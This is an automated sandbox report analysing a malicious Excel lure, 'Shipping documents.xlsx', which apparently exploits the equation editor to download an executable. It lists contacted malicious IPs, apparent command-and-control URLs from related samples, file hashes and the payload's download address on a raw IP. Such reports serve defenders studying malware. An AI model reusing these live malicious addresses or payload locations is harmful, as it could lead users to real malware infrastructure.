http://search.nifty.com/	explorer.exe, 00000006.00000000.2161663887.000000000A3E9000.00000008.00000001.sdmp	false		high
http://searchresults.news.com.au/	explorer.exe, 00000006.00000000.2161663887.000000000A3E9000.00000008.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://www.google.si/	explorer.exe, 00000006.00000000.2161663887.000000000A3E9000.00000008.00000001.sdmp	false		high
http://www.google.cz/	explorer.exe, 00000006.00000000.2161663887.000000000A3E9000.00000008.00000001.sdmp	false		high
http://www.soso.com/	explorer.exe, 00000006.00000000.2161663887.000000000A3E9000.00000008.00000001.sdmp	false		high
http://www.univision.com/	explorer.exe, 00000006.00000000.2161663887.000000000A3E9000.00000008.00000001.sdmp	false		high
http://search.ebay.it/	explorer.exe, 00000006.00000000.2161663887.000000000A3E9000.00000008.00000001.sdmp	false		high
http://images.joins.com/ui_c/fvc_joins.ico	explorer.exe, 00000006.00000000.2161663887.000000000A3E9000.00000008.00000001.sdmp	false		high
http://www.asharqalawsat.com/	explorer.exe, 00000006.00000000.2161663887.000000000A3E9000.00000008.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://busca.orange.es/	explorer.exe, 00000006.00000000.2161663887.000000000A3E9000.00000008.00000001.sdmp	false		high
http://cnweb.search.live.com/results.aspx?q=	explorer.exe, 00000006.00000000.2161663887.000000000A3E9000.00000008.00000001.sdmp	false		high
http://auto.search.msn.com/response.asp?MT=	explorer.exe, 00000006.00000000.2161496067.000000000A330000.00000008.00000001.sdmp	false		high
http://search.yahoo.co.jp	explorer.exe, 00000006.00000000.2161663887.000000000A3E9000.00000008.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://www.target.com/	explorer.exe, 00000006.00000000.2161663887.000000000A3E9000.00000008.00000001.sdmp	false		high
http://buscador.terra.es/	explorer.exe, 00000006.00000000.2161663887.000000000A3E9000.00000008.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://search.orange.co.uk/favicon.ico	explorer.exe, 00000006.00000000.2161663887.000000000A3E9000.00000008.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://www.iask.com/	explorer.exe, 00000006.00000000.2161663887.000000000A3E9000.00000008.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://www.tesco.com/	explorer.exe, 00000006.00000000.2161663887.000000000A3E9000.00000008.00000001.sdmp	false		high
http://cgi.search.biglobe.ne.jp/	explorer.exe, 00000006.00000000.2161663887.000000000A3E9000.00000008.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://search.seznam.cz/favicon.ico	explorer.exe, 00000006.00000000.2161663887.000000000A3E9000.00000008.00000001.sdmp	false		high
http://suche.freenet.de/favicon.ico	explorer.exe, 00000006.00000000.2161663887.000000000A3E9000.00000008.00000001.sdmp	false		high
http://search.interpark.com/	explorer.exe, 00000006.00000000.2161663887.000000000A3E9000.00000008.00000001.sdmp	false		high
http://search.ipop.co.kr/favicon.ico	explorer.exe, 00000006.00000000.2161663887.000000000A3E9000.00000008.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://investor.msn.com/	explorer.exe, 00000006.00000000.2144874723.0000000003C40000.00000002.00000001.sdmp	false		high
http://search.espn.go.com/	explorer.exe, 00000006.00000000.2161663887.000000000A3E9000.00000008.00000001.sdmp	false		high
http://www.myspace.com/favicon.ico	explorer.exe, 00000006.00000000.2161663887.000000000A3E9000.00000008.00000001.sdmp	false		high
http://search.centrum.cz/favicon.ico	explorer.exe, 00000006.00000000.2161663887.000000000A3E9000.00000008.00000001.sdmp	false		high
http://p.zhongsou.com/favicon.ico	explorer.exe, 00000006.00000000.2161663887.000000000A3E9000.00000008.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://www.bigdillenergy.com/	ipconfig.exe, 00000007.00000002.2345511470.0000000002A12000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://service2.bfast.com/	explorer.exe, 00000006.00000000.2161663887.000000000A3E9000.00000008.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown

Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public

IP	Domain	Country	ASN	ASN Name	Malicious
52.58.78.16	unknown	United States	16509	AMAZON-02US	true
66.235.200.146	unknown	United States	13335	CLOUDFLARENETUS	true
85.10.195.227	unknown	Germany	24940	HETZNER-ASDE	true
66.96.162.138	unknown	United States	29873	BIZLAND-SDUS	true
216.170.126.121	unknown	United States	36352	AS-COLOCROSSINGUS	true
160.124.66.42	unknown	South Africa	132839	POWERLINE-AS-APPOWERLINEDATACENTERHK	true
188.93.150.44	unknown	Netherlands	49685	SIGNET-ASSignetBVNL	true
92.42.39.29	unknown	Turkey	49467	EUROTA-ASNEUROTAINTERNETSERVICESLTDTR	true
23.227.38.74	unknown	Canada	13335	CLOUDFLARENETUS	true
192.161.187.200	unknown	United States	8100	ASN-QUADRANET-GLOBALUS	false
104.16.16.194	unknown	United States	13335	CLOUDFLARENETUS	false

General Information

Joe Sandbox Version:	31.0.0 Red Diamond
Analysis ID:	323357
Start date:	26.11.2020
Start time:	21:11:49
Joe Sandbox Product:	CloudBasic
Overall analysis duration:	0h 9m 38s
Hypervisor based Inspection enabled:	false
Report type:	full
Sample file name:	Shipping documents.xlsx
Cookbook file name:	defaultwindowsofficecookbook.jbs
Analysis system description:	Windows 7 x64 SP1 with Office 2010 SP2 (IE 11, FF52, Chrome 57, Adobe Reader DC 15, Flash 25.0.0.127, Java 8 Update 121, .NET 4.6.2)
Number of analysed new started processes analysed:	9
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	1
Technologies:	HCA enabled EGA enabled HDC enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Detection:	MAL
Classification:	mal100.troj.expl.evad.winXLSX@9/6@11/11
EGA Information:	Failed
HDC Information:	Successful, ratio: 26.5% (good quality ratio 25.6%) Quality average: 72.1% Quality standard deviation: 27.9%
HCA Information:	Successful, ratio: 96% Number of executed functions: 83 Number of non-executed functions: 49
Cookbook Comments:	Adjust boot time Enable AMSI Found application associated with file extension: .xlsx Found Word or Excel or PowerPoint or XPS Viewer Attach to Office via COM Scroll down Close Viewer
Warnings:	Show All Exclude process from analysis (whitelisted): dllhost.exe, conhost.exe Report size getting too big, too many NtCreateFile calls found. Report size getting too big, too many NtEnumerateValueKey calls found. Report size getting too big, too many NtQueryAttributesFile calls found.

Simulations

Behavior and APIs

Time	Type	Description
21:12:58	API Interceptor	66x Sleep call for process: EQNEDT32.EXE modified
21:13:00	API Interceptor	65x Sleep call for process: vbc.exe modified
21:13:20	API Interceptor	218x Sleep call for process: ipconfig.exe modified
21:13:46	API Interceptor	1x Sleep call for process: explorer.exe modified

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
52.58.78.16	PO EME39134.xlsx	Get hash	malicious	Browse	www.muvmiry.com/mfg6/?NL08b=bLXuQ0dQP6ytO8tJ9mzCKhtDbuPWwsM6hpNCZm/len/r8ZkHKew9l8wwKJGUhLNhJCA2aw==&Ab=JpApTx
	PRODUCT INQUIRY BNQ1.xlsx	Get hash	malicious	Browse	www.besteggcreditcard.com/coz3/?RFN4=a/ztdlFJlhxM2r+IBkSOd/itNmg8ZT70AaNM2x+2BWn224IL+Pz//n0zCcYtSkXb1ACu/w==&RB=NL00JzKhBv9HkNRp
	fSBya4AvVj.exe	Get hash	malicious	Browse	www.besteggcreditcard.com/coz3/?Cb=a/ztdlFMlmxI27yEDkSOd/itNmg8ZT70AaVcqyi3F2n32JkN5fizpjMxB6YSV0vQ3gqImPTq2A==&uVg8S=yVCTVPM0BpPlbRn
	ptFIhqUe89.exe	Get hash	malicious	Browse	www.muvmiry.com/mfg6/?EZxHcv=idCXUjVPw&X2MdRr9H=bLXuQ0dVP9ypOshF/mzCKhtDbuPWwsM6hpVSFljkaH/q8oIBNOhxz4IyJsqClbJSCBdG
	EME.39134.xlsx	Get hash	malicious	Browse	www.intact.media/mfg6/?rF=_HCtZ4&yzux_nSp=b6HLQnr1nLoa39Ydr0IvZP1++AM1tzQXE0H5i/XdEnJw02jW6yMX/B+fWxmcOCSPLT01fg==
	Purchase Order 40,7045$.exe	Get hash	malicious	Browse	www.hemparcade.com/igqu/?7nExDDz=xFlHIrj+O5a3po2FyI6qdarcVpFay3CC2mUufkmJsWJU6dqoom027fC98Qm7USnQA3DnFd91lQ==&znedzJ=zZ08lr
	Order specs19.11.20.exe	Get hash	malicious	Browse	www.hopeharboracademy.com/nwrr/?Rxo=L6hH4NIhfjzT&cj=Pi3dZNULKacZO0lwTZm3VIIJvRqy9WRTjR1P4HicrXgGmUrIoUMqJ7S/A3ArvLwtmevO+VO23g==
	Purchase Order 40,7045.exe	Get hash	malicious	Browse	www.hemparcade.com/igqu/?YnztXrjp=xFlHIrj+O5a3po2FyI6qdarcVpFay3CC2mUufkmJsWJU6dqoom027fC98TKSXSboJU2x&sBZxwb=FxlXFP2PHdiD2
	SWIFT_HSBC Bank.exe	Get hash	malicious	Browse	www.viltais.com/nt8e/?7nwltvxh=lPNjsY1H0UkcK2guRo/z/De4MaZSsgXVmjo1l8Wqu/JQpRHkDmjukntjJMa7ZMKbETQi&org=3foxnfCXOnIhKD
	Order Specification Requirement With Ref. AMABINIF38535.exe	Get hash	malicious	Browse	www.stranded.xyz/utau/?p64=8prxehCX&2dZ8=dR3TRUG1QGrDYRBc9/3PRmogi1D8+kv0RMejNxu9Gn4uSO50WrJFoJLJiRJ5mGAJbjLS
	new file.exe.exe	Get hash	malicious	Browse	www.sunflowersbikini.com/o1u9/?uFNH=XRlPhLopGJm&njkdnt=NfcJdyO4TBqmRNhg7R1KNJwTQ4N5hlclnZQkvT+zgqJmuxY/wV7RTlrJQJKYZhgz2gKA
	XCnhrl4qRO.exe	Get hash	malicious	Browse	www.phybby.com/xnc/?iB=CnlpdrqHk6fHx&uN9da=KMkfkwH+qCev6y9SIhjzkdXaKQKuNlF/lv9fMwnf5/4ZPrTh2Mio2MF0cfaBEzR8Th1t
	COMMERCIAL INVOICE BILL OF LADING DOC.exe	Get hash	malicious	Browse	www.basketdelivered.com/o9b2/?u6u4=7OzGVZ/w9qx4BfB58pU149PPhqFNbT8gk8tJrAZglrdYXTj2i3q7BPycRIRvKc0H9QVN&J484=xPJtLXbX
	tbzcpAZnBK.exe	Get hash	malicious	Browse	www.jencian.com/t4vo/?t8S8=GNX37zD4+hCCMzbajgO2uA69rnGPPC6iQo0EFF7Ue/8gqGUBoM5ya+5BJI3qcC1vYrK1&Njfhlh=8p4PgtUX
	zYUJ3b5gQF.exe	Get hash	malicious	Browse	www.hemparcade.com/igqu/?1b8hnra=xFlHIrj+O5a3po2FyI6qdarcVpFay3CC2mUufkmJsWJU6dqoom027fC98Qm7USnQA3DnFd91lQ==&OZNPdr=iJEt_DFhGZplHfm0
	COMMERCIAL INVOICE BILL OF LADING DOC.exe	Get hash	malicious	Browse	www.basketdelivered.com/o9b2/?DVB0=pTlpd6wHb&QR0=7OzGVZ/w9qx4BfB58pU149PPhqFNbT8gk8tJrAZglrdYXTj2i3q7BPycRLxVaNU/n30K
	RFQ-1225 BE285-20-B-1-SMcS - Easi-Clip Project.exe	Get hash	malicious	Browse	www.central.properties/vrf/?jVgH=aHUqqRuO6ZK9z0Ddr0bilnwC+HUi2BKQSuMw/XTnNfUykuBqiT/kuVIPFhCASh0TBUtx&-Zi=W6RxUV3PO
	Factura.exe	Get hash	malicious	Browse	www.devcomunicacao.com/ve9i/?_f-tK4=pQO4LhLAXoDAWMXX61mXtQYyMLN+wLZ8Px2vxkY+llKJMI7QZndoWfY9jQFnQqWsTUfq&hvK8=Q4j0
	Purchase Order 40,7045$.exe	Get hash	malicious	Browse	www.hemparcade.com/igqu/?GPWlMXk=xFlHIrj+O5a3po2FyI6qdarcVpFay3CC2mUufkmJsWJU6dqoom027fC98TK4IiroNW+x&Ano=O2JpLTIpT0jt
	bSpRY88fjIgazcB.exe	Get hash	malicious	Browse	www.cazoud.com/k8b/
66.235.200.146	Inv.exe	Get hash	malicious	Browse	www.speedyangelslogictics.com/tabo/?_jlT_=Zfdl7rLHRt&lJBxHNf=hElOJ7WvBK6OoblXew4OSXUWmlSUP44N1/lEsr7njKl0Q3gTlcfaSYDocD+jx3QCi5AG+z834Q==
	http://inkteach.com/cgi-bin/parts_service/kukqw/	Get hash	malicious	Browse	inkteach.com/cgi-bin/parts_service/kukqw/
	Artha Karya Utama (Aku Food) - Quotation.exe	Get hash	malicious	Browse	www.evrysnorer.com/esp5/?Jdvl=RwHHFgf38E+mzuRuAOBHuZyFShpBpFv2K68Cc3GjJWvgS4mHuY4jiH6TimPUs1S9+7MK2kxlQQ==&mdsd=R48xo
	Qoutation.exe	Get hash	malicious	Browse	www.reedwaslost.com/tmc8/?K4=4hLpnZI&BR=py9ck3N1mRhoDGk3zZMkpB63suxVBJd8uK7umUQYjcJEmNg5dJCbJdyqsq/+DtBEmryg
	AWB#788898766.pdf.exe	Get hash	malicious	Browse	www.augustagaston.com/etb/?ohrX_=4pCId+lOW5bjSPjcdc+/Ttn6RRNokoeDXdExqWgpqxD6ujrBy7mdOazgRaBMulMiZr0W&uDKd4=N6uTwl-pXhL
	TeqAm5n0Dw.doc	Get hash	malicious	Browse	joshleeband.com/sport/rockstar.php

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
parking.namesilo.com	PRODUCT INQUIRY BNQ1.xlsx	Get hash	malicious	Browse	64.32.22.102
	SR7UzD8vSg.exe	Get hash	malicious	Browse	192.161.187.200
	Purchase Order 40,7045$.exe	Get hash	malicious	Browse	204.188.203.155
	KYC_DOC_.EXE	Get hash	malicious	Browse	204.188.203.155
	Payment copy.doc	Get hash	malicious	Browse	70.39.125.244
	jtFF5EQoEE.exe	Get hash	malicious	Browse	209.141.38.71
	H4A2-423-EM154-302.exe	Get hash	malicious	Browse	192.161.187.200
	New Additional Agreement.exe	Get hash	malicious	Browse	64.32.22.102
	nova narud#U017eba.exe	Get hash	malicious	Browse	168.235.88.209
	M11sVPvWUT.exe	Get hash	malicious	Browse	204.188.203.155
	PpCVLJxsOp.exe	Get hash	malicious	Browse	198.251.84.92
	file.exe	Get hash	malicious	Browse	45.58.190.82
	#U03b4#U03b5#U03af#U03b3#U03bc#U03b1 #U03c0#U03c1#U03bf#U03ca#U03cc#U03bd#U03c4#U03bf#U03c2.exe	Get hash	malicious	Browse	198.251.81.30
	SKA201019.exe	Get hash	malicious	Browse	168.235.88.209
	Qaizen19.10.2020.exe	Get hash	malicious	Browse	64.32.22.102
	Orden de compra.exe	Get hash	malicious	Browse	188.164.131.200
	New Purchase Order 501,689$.exe	Get hash	malicious	Browse	204.188.203.155
	New Purchase Order 501,689$.exe	Get hash	malicious	Browse	192.161.187.200
	New Purchase Order 501,689$.exe	Get hash	malicious	Browse	168.235.88.209
	New Purchase Order 50,689$.exe	Get hash	malicious	Browse	64.32.22.102
target.clickfunnels.com	RfqYEW3Oc5.exe	Get hash	malicious	Browse	104.16.16.194
	Data Specifications.exe	Get hash	malicious	Browse	104.16.14.194
	zisuzZpoW2.exe	Get hash	malicious	Browse	104.16.14.194
	Remittance Scan DOC-2029293#PI207-048.pptx.exe	Get hash	malicious	Browse	104.16.12.194
	Q1028838.exe	Get hash	malicious	Browse	104.16.14.194
	61September Order List.PD.exe	Get hash	malicious	Browse	104.16.16.194
	CONFIRMATION OF BANK DETAILS.exe	Get hash	malicious	Browse	104.16.12.194
	47BTRT19-257.exe	Get hash	malicious	Browse	104.16.14.194
	98740135.exe	Get hash	malicious	Browse	104.16.14.194
shops.myshopify.com	PO98765.exe	Get hash	malicious	Browse	23.227.38.74
	inv.exe	Get hash	malicious	Browse	23.227.38.74
	EME_PO.39134.xlsx	Get hash	malicious	Browse	23.227.38.74
	Shipment Document BLINV And Packing List Attached.exe	Get hash	malicious	Browse	23.227.38.74
	Swift Copy.exe	Get hash	malicious	Browse	23.227.38.74
	Inv.exe	Get hash	malicious	Browse	23.227.38.64
	CSq58hA6nO.exe	Get hash	malicious	Browse	23.227.38.64
	New Order .xlsx	Get hash	malicious	Browse	23.227.38.64
	NQQWym075C.exe	Get hash	malicious	Browse	23.227.38.64
	Order specs19.11.20.exe	Get hash	malicious	Browse	23.227.38.64
	Payment Advice - Advice Ref GLV823990339.exe	Get hash	malicious	Browse	23.227.38.64
	SWIFT_HSBC Bank.exe	Get hash	malicious	Browse	23.227.38.64
	ORDER SPECIFITIONS.exe	Get hash	malicious	Browse	23.227.38.64
	anthony.exe	Get hash	malicious	Browse	23.227.38.64
	udtiZ6qM4s.exe	Get hash	malicious	Browse	23.227.38.64
	qAOaubZNjB.exe	Get hash	malicious	Browse	23.227.38.64
	uM0FDMSqE2.exe	Get hash	malicious	Browse	23.227.38.64
	new file.exe.exe	Get hash	malicious	Browse	23.227.38.64
	jrzlwOa0UC.exe	Get hash	malicious	Browse	23.227.38.64
	PDF ICITIUS33BUD10307051120003475.exe	Get hash	malicious	Browse	23.227.38.64

ASN

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
AMAZON-02US	PO_0012009.xlsx	Get hash	malicious	Browse	99.79.190.44
	paperport_3753638839.exe	Get hash	malicious	Browse	13.224.89.193
	opzi0n1[1].dll	Get hash	malicious	Browse	13.224.89.96
	http://email.balluun.com/ls/click?upn=0tHwWGqJA7fIfwq261XQPoa-2Bm5KwDIa4k7cEZI4W-2FdMZ1Q80M51jA5s51EdYNFwUO080OaXBwsUkIwQ6bL8cCo1cNcDJzlw2uVCKEfhUzZ7Fudhp6bkdbJB13EqLH9-2B4kEnaIsd7WRusADisZIU-2FqT0gWvSPQ-2BUMBeGniMV23Qog3fOaT300-2Fv2T0mA5uuaLf6MwKyAEEDv4vRU3MHAWtQ-3D-3DaUdf_BEBGVEU6IBswk46BP-2FJGpTLX-2FIf4Ner2WBFJyc5PmXI5kSwVWq-2FIninIJmDnNhUsSuO8YJPXc32diFLFly8-2FlazGQr8nbzBIO-2BSvdfUqJySNySwNZh5-2F7tiFSU4CooXZWp-2FjpdCX-2Fz89pGPVGN3nhMItFmIBBYMcjwlGWZ8vS3fpyiPHr-2BxekPNfR4Lq-2Baznil07vpcMoEZofdPQTnqnmg-3D-3D	Get hash	malicious	Browse	34.209.19.120
	http://searchlf.com	Get hash	malicious	Browse	13.224.93.71
	https://pembina.sharepoint.com/teams/BOandP/_layouts/15/guestaccess.aspx?share=Ev8UHcgPkQRPnPpDIa8PTeUBDnUZj2epg0IcLzD6O0XQNQ&e=5:GyiSQ3&at=9	Get hash	malicious	Browse	13.224.93.10
	https://tenderdocsrfp.typeform.com/to/RVzhstxV	Get hash	malicious	Browse	52.33.248.165
	https://www.canva.com/design/DAEOhhihuRE/ilbmdiYYv4SZabsnRUeaIQ/view?utm_content=DAEOhhihuRE&utm_campaign=designshare&utm_medium=link&utm_source=sharebutton	Get hash	malicious	Browse	44.236.72.93
	https://omgzone.co.uk/	Get hash	malicious	Browse	13.224.93.77
	https://doc.clickup.com/p/h/84zph-7/c3996c24fc61b45	Get hash	malicious	Browse	54.77.92.238
	http://t.comms.officeworks.com.au/r/?id=hb22c4478,920a576c,91374a10&p1=developerhazrat.com/p13p13yu13/bGVnYWxpbnRAc2VhcnNoYy5jb20=%23#c13c13v13h13h13u13l13j13m##	Get hash	malicious	Browse	18.136.188.28
	http://email.balluun.com/ls/click?upn=KzNQqcw6vAwizrX-2Fig1Ls6Y5D9N6j9I5FZfBCN8B2wRxBmpXcbUQvKOFUzJGiw-2F3Qy64T8VZ2LXT8NNNJG9bemh7vjcLDgF5-2FXPBBBqdJ0-2BpvIlXlKrZECAirL9YySN2b1LT-2Bcy1l-2F0fp1Pwvv3I4j7XHHKagv-2FxlVdd85P38ZuA-2Bvv5JF3QaAOx19sqG0-2BnULpm_J-2BsRItFMcwpTA18DVdBlGBJyUhFuIaAEybVNgKjH795y-2Bjn2esAEGPPa76dl-2BxD62wo4xT0BtNrFdVu0eWgx-2F6eRqupI7yZWQAa-2FBr1dlsLgX0hlcDSdDmAHsaZaG3WUUyADLR7thqFcU32Djt0AEfQ9qS0428-2BH1u-2Fk1E3KVFo9IePxc9mOWOHzwBkFv-2FOdeNUShdwqtjGBw2zuSNSTyLDRcypBOMpUtPdiR8ihMQ0-3D	Get hash	malicious	Browse	34.209.19.120
	https://epl.paypal-communication.com/H/2/v600000175fc9567aec3e4496e965fc958/d07dcaec-c38a-4069-96dc-06e53581f535/HTML	Get hash	malicious	Browse	13.224.93.119
	PO EME39134.xlsx	Get hash	malicious	Browse	52.58.78.16
	PRODUCT INQUIRY BNQ1.xlsx	Get hash	malicious	Browse	52.58.78.16
	Document Required.xlsx	Get hash	malicious	Browse	54.179.174.132
	https://nl.raymondbaez.com/xxx/redirect/	Get hash	malicious	Browse	44.236.48.31
	http://unbouncepages.com/vm4412084773830-05-udjawpdruxmbaqdsumpx/	Get hash	malicious	Browse	13.224.93.81
	paperport_3753638839.exe	Get hash	malicious	Browse	13.224.89.130
	fSBya4AvVj.exe	Get hash	malicious	Browse	52.58.78.16
HETZNER-ASDE	document-1599926043.xls	Get hash	malicious	Browse	78.46.235.88
	document-1718469399.xls	Get hash	malicious	Browse	78.46.235.88
	document-1599926043.xls	Get hash	malicious	Browse	78.46.235.88
	document-1718469399.xls	Get hash	malicious	Browse	78.46.235.88
	document-1718966580.xls	Get hash	malicious	Browse	78.46.235.88
	document-1718966580.xls	Get hash	malicious	Browse	78.46.235.88
	document-169210842.xls	Get hash	malicious	Browse	78.46.235.88
	document-169210842.xls	Get hash	malicious	Browse	78.46.235.88
	document-1720537347.xls	Get hash	malicious	Browse	78.46.235.88
	document-1720537347.xls	Get hash	malicious	Browse	78.46.235.88
	http://45.146.165.216	Get hash	malicious	Browse	46.4.123.222
	document-1567616642.xls	Get hash	malicious	Browse	78.46.235.88
	SWIFT.EXE	Get hash	malicious	Browse	95.216.7.161
	document-1567616642.xls	Get hash	malicious	Browse	78.46.235.88
	document-1467223313.xls	Get hash	malicious	Browse	78.46.235.88
	document-1467223313.xls	Get hash	malicious	Browse	78.46.235.88
	document-1378171711.xls	Get hash	malicious	Browse	78.46.235.88
	document-1378171711.xls	Get hash	malicious	Browse	78.46.235.88
	document-1325224072.xls	Get hash	malicious	Browse	78.46.235.88
	document-1325224072.xls	Get hash	malicious	Browse	78.46.235.88
CLOUDFLARENETUS	https://webmail-re5rere.web.app/?emailtoken=test@test.com&domain=test.com	Get hash	malicious	Browse	162.159.138.81
	Nota di consegna_TNT507CC.exe	Get hash	malicious	Browse	104.18.54.93
	txema_inef_post_live_loader_88.exe	Get hash	malicious	Browse	104.18.35.76
	due-invoice.xlsm	Get hash	malicious	Browse	104.23.98.190
	ANGEBOTXANFORDERNXXXXXXXXX26-11-2020.ppt	Get hash	malicious	Browse	104.18.49.20
	SecuriteInfo.com.Gen.NN.ZemsilF.34658.m0@a8V1yrei.exe	Get hash	malicious	Browse	104.24.126.89
	http://nity.midlidl.com/index	Get hash	malicious	Browse	104.28.14.54
	https://hosting-e899f.web.app/#ba11_go_coa_chf@emfa.pt	Get hash	malicious	Browse	104.16.18.94
	PAYMENT RECEIPT.html	Get hash	malicious	Browse	104.16.19.94
	Order 51897.exe	Get hash	malicious	Browse	104.24.126.89
	paperport_3753638839.exe	Get hash	malicious	Browse	104.26.2.247
	PO98765.exe	Get hash	malicious	Browse	23.227.38.74
	AsyncClient.exe	Get hash	malicious	Browse	104.24.126.89
	https://sugar-stirring-mockingbird.glitch.me/#comp@hansi.at	Get hash	malicious	Browse	104.16.18.94
	inv.exe	Get hash	malicious	Browse	23.227.38.74
	doc-6954.xls	Get hash	malicious	Browse	104.18.62.178
	CO R94-04________PDF.jar	Get hash	malicious	Browse	104.20.23.46
	QQWUO898519.xls	Get hash	malicious	Browse	104.18.48.20
	2020112395387_pdf.exe	Get hash	malicious	Browse	104.18.32.47
	CO R94-04________PDF.jar	Get hash	malicious	Browse	104.20.23.46
BIZLAND-SDUS	anthon.exe	Get hash	malicious	Browse	66.96.162.129
	PO EME39134.xlsx	Get hash	malicious	Browse	65.254.248.145
	EME_PO.39134.xlsx	Get hash	malicious	Browse	66.96.162.143
	Shipment Document BLINV And Packing List Attached.exe	Get hash	malicious	Browse	66.96.162.128
	ptFIhqUe89.exe	Get hash	malicious	Browse	66.96.162.138
	ExQKDWm3fW.exe	Get hash	malicious	Browse	66.96.162.141
	C03N224Hbu.exe	Get hash	malicious	Browse	65.254.248.145
	http://honest-deals.com	Get hash	malicious	Browse	66.96.147.105
	NQQWym075C.exe	Get hash	malicious	Browse	65.254.250.119
	https://bakrisoil.com/wp-content/cd.php?e=gjeffries@hughesellard.com	Get hash	malicious	Browse	66.96.149.32
	8miw6WNHCt.exe	Get hash	malicious	Browse	207.148.248.143
	tbzcpAZnBK.exe	Get hash	malicious	Browse	66.96.162.147
	Sales_Invoice_503657_415470.xls	Get hash	malicious	Browse	209.59.199.129
	sbwAPP6dB2.dll	Get hash	malicious	Browse	209.59.199.129
	Inv_729617_999719.xlsm	Get hash	malicious	Browse	209.59.199.129
	Sales_Invoice_666786_146299.xlsm	Get hash	malicious	Browse	209.59.199.129
	Invoice_424324_323486.xlsm	Get hash	malicious	Browse	209.59.199.129
	bvht1xpdf.dll	Get hash	malicious	Browse	209.59.199.129
	0VikCnzrVT.exe	Get hash	malicious	Browse	66.96.162.147
	H4A2-423-EM152-010.TIF.exe	Get hash	malicious	Browse	66.96.162.146

JA3 Fingerprints

No context

Dropped Files

No context

Created / dropped Files

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\vbc[1].exe Download File
Process:	C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
File Type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	downloaded
Size (bytes):	478720
Entropy (8bit):	7.699517779790953
Encrypted:	false
SSDEEP:	12288:g0b4JO3QrN2iNXxHqSqi+owWODVm4q3ntt8LF:Lb4JO3yN1VxHsphm4wr8
MD5:	FD09F4D0B2373B9634F2D8AD2F5C899D
SHA1:	8074CD001665B9CA3FD0392CB74F8525D915A812
SHA-256:	F592906B568C6138386673B45E8ACBEC69CC736394C29BE98FBB1925A39CF23A
SHA-512:	B96DAC273A50ED07FC615CBAB935DF508D18EA6084A35D9AC85B580E8B43B2A40354F5B572836E8A438763F92861EDF6B57BFC0DAED8AA655B7785E090DE2513
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 29%
Reputation:	low
IE Cache URL:	http://216.170.126.121/hkcmd/vbc.exe
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....j._..............0..D...........b... ........@.. ....................................@.................................<b..O.................................................................................... ............... ..H............text....B... ...D.................. ..`.rsrc................F..............@..@.reloc...............L..............@..B................pb......H........r...c......x...L................................................0..G.........}.....(.......(......s....}.....{.....o.....(......{.....{....o.......0...........(.....{....{....(.......(....~....vl....,..{....{....o......{....{.....o....o......{....(....}.....o......3..{....{....o.......+....,@..{....{....o....s......{.....{....{....o......{....{....o.........{....( ...o!.....{....~....o".......{....(#...o!.....{....~....o".......0..+.........,..{.......+....,...{.

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\19D007AA.jpeg Download File
Process:	C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
File Type:	gd-jpeg v1.0 (using IJG JPEG v80), quality = 90", baseline, precision 8, 700x990, frames 3
Category:	dropped
Size (bytes):	48770
Entropy (8bit):	7.801842363879827
Encrypted:	false
SSDEEP:	768:uLgWImQ6AMqTeyjskbJeYnriZvApugsiKi7iszQ2rvBZzmFz3/soBqZhsglgDQPT:uLgY4MqTeywVYr+0ugbDTzQ27A3UXsgf
MD5:	AA7A56E6A97FFA9390DA10A2EC0C5805
SHA1:	200A6D7ED9F485DD5A7B9D79B596DE3ECEBD834A
SHA-256:	56B1EDECC9A282A9FAAFD95D4D9844608B1AE5CCC8731F34F8B30B3825734974
SHA-512:	A532FE4C52FED46919003A96B882AE6F7C70A3197AA57BD1E6E917F766729F7C9C1261C36F082FBE891852D083EDB2B5A34B0A325B7C1D96D6E58B0BED6C5782
Malicious:	false
Reputation:	moderate, very likely benign file
Preview:	......JFIF.............;CREATOR: gd-jpeg v1.0 (using IJG JPEG v80), quality = 90....C....................................................................C............................................................................"............................................................}........!1A..Qa."q.2....#B...R..$3br........%&'()456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz..............................................................................................................................w.......!1..AQ.aq."2...B.....#3R..br...$4.%.....&'()56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz....................................................................................?..R..(...(...(......3Fh.....(....P.E.P.Gj(...(....Q@.%-...(.......P.QKE.%.........;.R.@.E-...(.......P.QKE.'jZ(...QE..........h...(...QE.&(.KE.'jZ(...QE..........h...(...QE.&(.KE.'jZ(...QE..........h...(...QE.&(.KE.'j^.....(...(...(....w...3Fh....E......4w...h.%...................E./J)(......Z)(......Z)(....

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\8B71DA3C.emf Download File
Process:	C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
File Type:	Windows Enhanced Metafile (EMF) image data version 0x10000
Category:	dropped
Size (bytes):	1099960
Entropy (8bit):	2.015324823856431
Encrypted:	false
